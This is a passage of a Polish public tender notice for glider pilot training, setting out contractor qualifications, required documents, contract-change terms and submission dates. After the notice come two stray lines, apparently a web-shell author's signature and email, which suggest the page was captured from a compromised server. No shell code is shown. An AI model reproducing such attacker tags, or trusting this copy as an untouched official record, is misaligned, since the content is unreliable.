class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/><br/>2.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/><br/>2.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów: <br/><br/>2.2.1. ZADANIE I i ZADANIE II - teoretyczne i praktyczne szkolenie szybowcowe<br/><br/>Warunek posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej zostanie spełniony jeżeli Wykonawca wykaże, że posiada:<br/><br/>•	ważny dokument: „Certyfikat dla zatwierdzonej organizacji szkolenia lotniczego” – certyfikat ATO (Approved Training Organizations) uprawniający do przeprowadzania teoretycznego i praktycznego szkolenia do licencji pilota szybowcowego – SPL wydany przez Urząd Lotnictwa Cywilnego;<br/><br/>i<br/><br/>•	aktualne zaświadczenie wystawione przez Urząd Lotnictwa Cywilnego (lub inny dokument wystawiony przez Urząd Lotnictwa Cywilnego), potwierdzające, że wobec Wykonawcy nie zostało wszczęte postępowanie o zawieszeniu lub cofnięciu uprawnień do realizacji przedmiotu umowy <br/><br/>lub<br/><br/>•	„Deklarację DTO (Declared Training Organisation) z nadanym numerem referencyjnym dla tej deklaracji przez Prezesa Urzędu Lotnictwa Cywilnego, zezwalającą na prowadzenie szkolenia szybowcowego do licencji pilota szybowcowego SPL w zakresie teoretycznym i praktycznym;<br/><br/>i<br/><br/>•	Aktualne zaświadczenie wystawione przez Urząd Lotnictwa Cywilnego (lub inny dokument wystawiony przez Urząd Lotnictwa Cywilnego), potwierdzające, że nie zostało wszczęte postępowanie przez ULC o zawieszeniu lub cofnięciu decyzji o nadaniu deklaracji DTO . <br/>Przez pojęcie „aktualne” zaświadczenie lub inny dokument wystawiony przez Urząd Lotnictwa Cywilnego Zamawiający rozumie dokument wystawiony nie wcześniej niż 30 dni przed wszczęciem przedmiotowego postępowania, tj. nie wcześniej niż 30 dni przed publikacją ogłoszenia o przedmiotowym zamówieniu.<br/><br/>2.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/><br/>2.4. zdolności technicznej lub zawodowej:<br/>2.4.1. ZADANIE I i ZADANIE II - teoretyczne i praktyczne szkolenie szybowcowe<br/><br/>Warunek zdolności technicznej lub zawodowej zostanie spełniony jeżeli:<br/><br/>2.4.2.1. Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał lub wykonuje co najmniej (1) jedną usługę w zakresie: szkolenia szybowcowego praktycznego zgodnie z „Programem szkolenia szybowcowego SPL” (Sailing Pilot Licence) uzgodnionym przez Urząd Lotnictwa Cywilnego - na kwotę już zrealizowanej usługi minimum 50 000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych) wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz z załączeniem dowodów, czy usługi te zostały wykonane lub są wykonywane należycie. <br/> <br/>Jedna usługa oznacza usługę wykonaną/wykonywaną na podstawie jednej umowy (zamawiający wymaga wykazania się wykonaniem 1 usługi - wykonanej lub wykonywanej na podstawie 1 umowy – obejmującej zakres i wartość wskazaną powyżej).<br/><br/>W przypadku składania oferty na ZADANIE I i ZADANIE II wystarczy wykazać się wykonaniem lub wykonywaniem 1 usługi szkolenia praktycznego szybowcowego na kwotę już zrealizowanej usługi minimum 50 000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych) - zamawiający wymaga wykazania się wykonaniem 1 usługi - wykonanej na podstawie 1 umowy – obejmującej zakres i wartość wskazaną powyżej.<br/>Zamawiający nie dopuszcza możliwości sumowania wartości usług zrealizowanych w ramach kilku umów w celu uzyskania progu wartościowego wyznaczonego przez Zamawiającego.<br/>2.4.2.2. Wykonawca wykaże, że dysponuje osobami, które będą uczestniczyć <br/>w wykonywaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi <br/>i doświadczeniem odpowiednim do funkcji, jakie zostaną im powierzone. <br/><br/>Wykonawca wykaże, że będzie dysponował w okresie realizacji zamówienia publicznego:<br/>•	minimum jednym instruktorem szkolenia szybowcowego teoretycznego posiadającym uprawnienia wydane przez Urząd Lotnictwa Cywilnego (licencje pilota szybowcowego – SPLz uprawnieniami instruktora) oraz posiadającym min. 3-letnie doświadczenie w pracy instruktorskiej;<br/>•	minimum dwoma instruktorami szkolenia szybowcowego praktycznego posiadającymi uprawnienia wydane przez Urząd Lotnictwa Cywilnego (licencje pilota szybowcowego – SPL z uprawnieniami instruktora) oraz posiadającymi min. 3-letnie doświadczenie w pracy instruktorskiej.<br/><br/>W przypadku składania oferty na ZADANIE I i ZADANIE II wystarczy, że Wykonawca wykaże, że będzie dysponował w okresie realizacji zamówienia publicznego:<br/>•	minimum jednym instruktorem szkolenia szybowcowego teoretycznego posiadającym uprawnienia wydane przez Urząd Lotnictwa Cywilnego (licencje pilota szybowcowego – SPLz uprawnieniami instruktora) oraz posiadającym min. 3-letnie doświadczenie w pracy instruktorskiej;<br/>•	minimum dwoma instruktorami szkolenia szybowcowego praktycznego posiadającymi uprawnienia wydane przez Urząd Lotnictwa Cywilnego (licencje pilota szybowcowego – SPL z uprawnieniami instruktora) oraz posiadającymi min. 3-letnie doświadczenie w pracy instruktorskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.	Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>2.2. W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału <br/>w postępowaniu Zamawiający zażąda następujących dokumentów:<br/><br/>2.2.1. oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej, <br/>w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę/ ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 pkt 5 ustawy Pzp - wzór oświadczenia stanowi załącznik nr 4 do SWZ;<br/><br/>2.2.2. Odpisu lub Informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4) ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/><br/>2.2.3. oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: <br/>- art. 108 ust. 1 pkt 3 ustawy, <br/>- art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, <br/>- art. 108 ust. 1 pkt 6 ustawy, <br/>- art. 109 ust. 1 pkt 4 ustawy<br/>- art. 7 ust. 1 ustawy z dnia 13 kwietnia o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (poz. 835).<br/>Wzór oświadczenia stanowi załącznik nr 10a/10b do SWZ; <br/><br/>3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) – dokumenty wymienione w pkt. 2.2. ppkt. 2.2.1., 2.2.2., 2.2.3. składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (partner konsorcjum/wspólnik spółki cywilnej). <br/><br/>4.	W przypadku innego podmiotu, na zdolnościach którego wykonawca polega, dokumenty wymienione w pkt. 2.2. ppkt. 2.2.1., 2.2.2., 2.2.3, Wykonawca składa w odniesieniu do każdego z podmiotów.<br/><br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 usta 1 ustawy Pzp dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>2.1. W zakresie potwierdzenia spełniania przez Wykonawcę warunku udziału <br/>w postępowaniu dotyczącego posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów Zamawiający zażąda: <br/>2.1.1. ZADANIE I i ZADANIE II (teoretyczne i praktyczne szkolenie szybowcowe):<br/>•	ważnego dokumentu: „Certyfikatu dla zatwierdzonej organizacji szkolenia lotniczego” – certyfikatu ATO (Approved Training Organizations) uprawniającego do przeprowadzania teoretycznego i praktycznego szkolenia do licencji pilota szybowcowego – SPL wydanego przez Urząd Lotnictwa Cywilnego;<br/>i<br/>•	aktualnego zaświadczenia wystawionego przez Urząd Lotnictwa Cywilnego (lub innego dokumentu wystawionego przez Urząd Lotnictwa Cywilnego), potwierdzającego, że wobec Wykonawcy nie zostało wszczęte postępowanie o zawieszeniu lub cofnięciu uprawnień do realizacji przedmiotu umowy <br/>lub<br/>•	„Deklaracji DTO (Declared Training Organisation) z nadanym numerem referencyjnym dla tej deklaracji przez Prezesa Urzędu Lotnictwa Cywilnego, zezwalającej na prowadzenie szkolenia szybowcowego do licencji pilota szybowcowego SPL w zakresie teoretycznym i praktycznym;<br/>i<br/>•	aktualnego zaświadczenia wystawionego przez Urząd Lotnictwa Cywilnego (lub innego dokumentu wystawionego przez Urząd Lotnictwa Cywilnego), potwierdzającego, że nie zostało wszczęte postępowanie przez ULC o zawieszeniu lub cofnięciu decyzji o nadaniu deklaracji DTO . <br/><br/>Przez pojęcie „aktualne” zaświadczenie lub inny dokument wystawiony przez Urząd Lotnictwa Cywilnego Zamawiający rozumie dokument wystawiony nie wcześniej niż 30 dni przed wszczęciem przedmiotowego postępowania, tj. nie wcześniej niż 30 dni przed publikacją ogłoszenia o przedmiotowym zamówieniu.<br/><br/>2.2. W zakresie potwierdzenia spełniania przez Wykonawcę warunku udziału w postępowaniu dotyczącego posiadania zdolności technicznej lub zawodowej Zamawiający zażąda:<br/><br/>2.2.1. ZADANIE I i ZADANIE II (teoretyczne i praktyczne szkolenie szybowcowe):<br/>•	wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie.<br/><br/>Z przedłożonego wykazu musi wynikać, że wykonawca należycie wykonał co najmniej jedną usługę w zakresie: szkolenia szybowcowego praktycznego zgodnie z „Programem szkolenia szybowcowego SPL” (Sailing Pilot Licence) uzgodnionym przez Urząd Lotnictwa Cywilnego - na kwotę już zrealizowanej usługi minimum 50 000,00 zł brutto .<br/> Jedna usługa oznacza usługę wykonaną/wykonywaną na podstawie jednej umowy (zamawiający wymaga wykazania się wykonaniem 1 usługi - wykonanej lub wykonywanej na podstawie 1 umowy – obejmującej zakres i wartość wskazaną powyżej).<br/><br/>W przypadku składania oferty na ZADANIE I i ZADANIE II wystarczy wykazać się wykonaniem lub wykonywaniem 1 usługi szkolenia praktycznego szybowcowego na kwotę już zrealizowanej usługi minimum 50 000,00 zł brutto<br/>•	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Szczegółowo wykaz wymaganych dokumentów na potwierdzenie spełniania warunków udziału w postępowaniu został opisany w Rozdziale 10 pkt. 2 SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, np. łącząc się w konsorcja lub spółki cywilne lub inną formę prawną.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z Wykonawców nie może<br/>podlegać wykluczeniu w okolicznościach, o których mowa w Rozdziale 6 SWZ.<br/>3. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku Wykonawca<br/>musi złożyć wraz z ofertą stosowne pełnomocnictwo uprawniające do wykonywania określonych czynności w postępowaniu<br/>o udzieleniu zamówienia publicznego na zasadach określonych w SWZ.<br/>4. Dokumenty składane przez członków konsorcjum czy wspólników spółki cywilnej, w tym oświadczenia muszą być<br/>podpisane przez wyznaczonego pełnomocnika lub osobę upoważnioną do reprezentowania danego podmiotu.<br/>5. W toku postępowania wszelka korespondencja ze strony Zamawiającego będzie kierowana do pełnomocnika danego<br/>podmiotu ubiegającego się wspólnie o zamówienie.<br/>6. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia publicznego zobowiązani są złożyć wraz z<br/>ofertą dokumenty wymienione w Rozdziale 10 w pkt. 1.5. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza wprowadzenie zmian Umowy w zakresie poniżej wskazanym, <br/>w szczególności w przypadku gdy konieczność wprowadzenia takich zmian wynikałaby <br/>z okoliczności, których nie można było przewidzieć w chwili zawierania Umowy: <br/><br/>1) zmiany terminu wykonania Umowy – gdy z powodu działania siły wyższej nie jest możliwe wykonanie przedmiotu Umowy w umówionym terminie, bądź gdy niewykonanie Umowy w terminie wyniknie z przyczyn leżących po stronie Zamawiającego <br/>2) przedłużenia terminu wykonania Umowy, o okres nie dłuższy niż okres trwania postępowania odwoławczego przed Krajową Izbą Odwoławczą oraz sądem powszechnym, w przypadku, gdy zostało wniesione odwołanie w postępowaniu <br/>o udzielenie zamówienia publicznego, <br/>3) zmiany wynagrodzenia – w przypadku zmiany przepisów prawnych (np. dotyczących stawek podatku VAT), jeżeli wpływa ona na wysokość należnego wykonawcy wynagrodzenia - zgodnie ze zmienionymi przepisami,<br/>4)	zmiany postanowień Umowy - gdy ich zmiana jest konieczna w związku ze zmianą decyzji wydawanych przez Ministra Obrony Narodowej, bądź zmianą wytycznych przełożonych Zamawiającego,<br/>5)	zmiany terminu szkolenia praktycznego szybowcowego, jeżeli z przyczyn od stron umowy niezależnych oraz niemożliwych do wcześniejszego przewidzenia (np. niekorzystne warunki atmosferyczne uniemożliwiające wykonywanie skoków spadochronowych), niemożliwe było przeprowadzenie szkolenia praktycznego w pierwotnym terminie. Powyższe zmiany nie będą powodowały naliczenia kar umownych dla Wykonawcy oraz nie będą stanowiły podstawy do jakichkolwiek innych roszczeń majątkowych ze strony Wykonawcy wobec Zamawiającego;<br/>6)	zmiany osób odpowiedzialnych za realizację umowy, jeżeli zajdzie taka potrzeba – <br/>w przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby uniemożliwiającej pełnienie powierzonych jej obowiązków;<br/><br/>2.	Zmiana postanowień zawartej Umowy może nastąpić za zgodą obu Stron wyrażoną <br/>w formie pisemnej pod rygorem nieważności, w postaci aneksu do Umowy. <br/><br/>3.	W celu dokonania zmian zapisów Umowy wnioskowanych przez Wykonawcę zobowiązany jest on pisemnie wystąpić z propozycją zmiany wraz z uzasadnieniem. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z dokumentami określonymi w rozdziale 10 pkt 1 SWZ należy złożyć za pośrednictwem platformy pod adresem https://platformazakupowa.pl/pn/41blsz/proceedings , na stronie dotyczącej odpowiedniego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-25 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Postępowanie prowadzone jest w związku z art. 359 pkt. 2) ustawy Pzp <br/>(zamówienia na usługi społeczne i inne szczególne usługi) <br/>w trybie podstawowym bez negocjacji zgodnie z art. 275 pkt 1) ustawy Pzp, <br/>o wartości szacunkowej zamówienia mniejszej niż progi unijne.<br/><br/>1. O udzielenie przedmiotowego zamówienia mogą ubiegać się Wykonawcy, którzy wykażą brak podstaw do wykluczenia na podstawie:<br/>• art. 108 ust. 1 ustawy Pzp;<br/>• art. 109 ust. 1 pkt. 4) ustawy Pzp;<br/>• art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (poz. 835).<br/>2. Dodatkowe informacje:<br/>a) Zamawiający nie przewiduje:<br/>• wizji lokalnych lub sprawdzenia przez Wykonawców dokumentów niezbędnych do realizacji zamówienia o których mowa w<br/>art. 131 ust. 2 (art. 281 ust. 2 pkt. 12) ustawy Pzp);<br/>• udzielania zaliczek na poczet realizacji zamówienia przez Wykonawcę;<br/>• zawarcia umowy ramowej;<br/>• ustanowienia dynamicznego systemu zakupów;<br/>• wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej (art. 281 ust. 2 pkt. 17) ustawy Pzp);<br/>• zwrotu kosztów udziału w postępowaniu (art. 281 ust. 2 pkt. 14) ustawy Pzp);<br/>• rozliczeń w walutach obcych (art. 281 ust. 2 pkt. 13) ustawy Pzp);<br/>• możliwości udzielenia dotychczasowemu wykonawcy dodatkowych usług, o których mowa w art. 214 ust. 1 pkt 7 ustawy<br/>Pzp (art. 281 ust. 2 pkt. 11) ustawy Pzp);<br/>• prowadzenia negocjacji;<br/>b) Zamawiający nie dopuszcza:<br/>• możliwości składania ofert wariantowych (art. 281 ust. 2 pkt. 6 Pzp);<br/>• składania ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty (art. 281 ust. 2 pkt.<br/>18 ustawy Pzp);<br/>c) Zamawiający nie zastrzega:<br/>• obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia (art. 281 ust. 2 pkt. 15) ustawy Pzp);<br/>• możliwości ubiegania się o udzielenie zamówienia wyłącznie przez Wykonawców, o których mowa w art. 94 ust. 1 ustawy<br/>Pzp (art. 281 ust. 2 pkt. 9) ustawy Pzp);<br/>d) postępowanie o udzielenie zamówienia prowadzi się w języku polskim;<br/>e) każdy Wykonawca może złożyć tylko po jednej ofercie;<br/>f) Unieważnienie postępowania (fakultatywne): Zamawiający przewiduje możliwość unieważnienia postępowania o<br/>udzielenie zamówienia na podstawie art. 255 ustawy Pzp oraz na podstawie art. 256 ustawy Pzp. Zgodnie z art. 310 pkt 1<br/>ustawy Pzp Zamawiający przewiduje możliwość unieważnienia przedmiotowego postępowania, jeżeli środki, które<br/>Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.<br/>3. Ze względu na ograniczoną ilość znaków w ogłoszeniu o zamówieniu dokumenty na potwierdzenie spełniania warunków<br/>udziału w postępowaniu zostały szczegółowo opisane w Rozdziale 10 pkt. 2 SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com